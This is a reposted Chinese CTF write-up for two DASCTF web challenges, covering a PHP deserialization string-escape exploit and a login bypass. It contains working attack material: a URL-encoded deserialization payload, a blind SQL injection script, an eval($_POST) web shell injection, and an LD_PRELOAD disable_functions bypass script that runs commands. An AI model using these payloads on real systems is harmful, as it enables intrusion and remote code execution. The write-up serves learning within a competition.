当前位置:   article > 正文

DASCTF-两道web题复现_dasctf{

dasctf{

记录一下官方题解

Ezunserialize

打开题目看到源码

  1. <?php
  2. show_source("index.php");
  3. function write($data) {
  4. return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
  5. }
  6. function read($data) {
  7. return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
  8. }
  9. class A{
  10. public $username;
  11. public $password;
  12. function __construct($a, $b){
  13. $this->username = $a;
  14. $this->password = $b;
  15. }
  16. }
  17. class B{
  18. public $b = 'gqy';
  19. function __destruct(){
  20. $c = 'a'.$this->b;
  21. echo $c;
  22. }
  23. }
  24. class C{
  25. public $c;
  26. function __toString(){
  27. //flag.php
  28. echo file_get_contents($this->c);
  29. return 'nice';
  30. }
  31. }
  32. $a = new A($_GET['a'],$_GET['b']);
  33. //省略了存储序列化数据的过程,下面是取出来并反序列化的操作
  34. $b = unserialize(read(write(serialize($a))));

先实现B->C

  1. $b = new b();
  2. $c = new c();
  3. $c->c = 'flag.php';
  4. $b->b = $c;
  5. $x = serialize($b);
  6. echo $x;
  7. //O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

然后就是字符串逃逸实现A->B

  1. $a = new A("\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0",'1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};}');
  2. $a = serialize($a);
  3. echo $a."\n";
  4. $a = write($a);
  5. echo $a."\n";
  6. $a = read($a);
  7. echo $a."\n";

将payload进行url加密

a=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&b=1%22%3Bs%3A8%3A%22password%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

babytricks

打开题目是个登录界面,查看源码发现提示

<!-- tips:select * from user where user='$user' and passwd='%s'-->

这是个格式化字符串漏洞,过滤了select,单引号,like,regexp,跑密码脚本,密码最后一位需要减一

  1. import requests
  2. flag=""
  3. flag2=""
  4. arg1=""
  5. arg2=""
  6. i=1
  7. n=2
  8. for i in range(1,28):
  9. print(i)
  10. m=64
  11. j=64
  12. for q in range(1,8):
  13. if q!=1:
  14. j=j/2
  15. if n==1:
  16. m=m+j
  17. elif n==0:
  18. m=m-j
  19. arg2=chr(m)
  20. arg2=flag2+arg2
  21. url="http://183.129.189.60:10010/"
  22. user='%1$c^0 and passwd between CONCAT("{}",BINARY("")) and CONCAT("{}",BINARY(""))#'.format(arg1,arg2)
  23. #print user
  24. data={"user":user,
  25. "passwd":39
  26. }
  27. p=requests.post(url,data=data)
  28. if "username or password error" not in p.text:
  29. n=0
  30. else:
  31. n=1
  32. if q==7:
  33. if "username or password error" not in p.text:
  34. flag=flag+chr(m-1)
  35. arg2=chr(m-1)
  36. flag2=flag2+arg2
  37. else:
  38. flag=flag+chr(m)
  39. flag2=arg2
  40. print flag
  41. #GoODLUcKcTFer202OHAckFuN

得到密码之后登录,提示前台什么都没有,添加admin目录进入后台登录页面,使用刚刚得到的密码,得到下一步源码

  1. Your sandbox: ./shells/iIu9B9eVuikO3cOi/ set your shell
  2. <?php
  3. error_reporting(0);
  4. session_save_path('session');
  5. session_start();
  6. require_once './init.php';
  7. if($_SESSION['login']!=1){
  8. die("<script>window.location.href='./index.php'</script>");
  9. }
  10. if($_GET['shell']){
  11. $shell= addslashes($_GET['shell']);
  12. $file = file_get_contents('./shell.php');
  13. $file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{$shell}';", $file);
  14. file_put_contents('./shell.php', $file);
  15. }else{
  16. echo "set your shell"."<br>";
  17. chdir("/");
  18. highlight_file(dirname(__FILE__)."/admin.php");
  19. }
  20. ?>

payload

  1. ?shell=;eval($_POST[a]);
  2. ?shell=$0

shell.php文件中的代码

  1. <?php
  2. $shell = '$shell = ';eval($_POST[a]);';';
  3. echo $shell;

由于这里过滤了很多系统函数,使用LD_PRELOAD进行bypass

  1. <?php
  2. echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
  3. $cmd = $_GET["cmd"];
  4. $out_path = $_GET["outpath"];
  5. $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
  6. echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
  7. putenv("EVIL_CMDLINE=" . $evil_cmdline);
  8. $so_path = $_GET["sopath"];
  9. putenv("LD_PRELOAD=" . $so_path);
  10. $res = gnupg_init();
  11. gnupg_seterrormode($res, GNUPG_ERROR_WARNING);
  12. $info = gnupg_keyinfo($res, 'your-key-id');
  13. echo "Key - Info<pre>";
  14. var_dump($info);
  15. echo "<pre>";
  16. echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
  17. unlink($out_path);
  18. ?>

访问下面网址,得到flag

http://183.129.189.60:10010/admin/shells/R0zK2XMtjvzvyxWz/bypass.php?cmd=cat%20/flag&outpath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/xx&sopath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/bypass_disablefunc_x64.so

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/900656
推荐阅读
相关标签
  

闽ICP备14008679号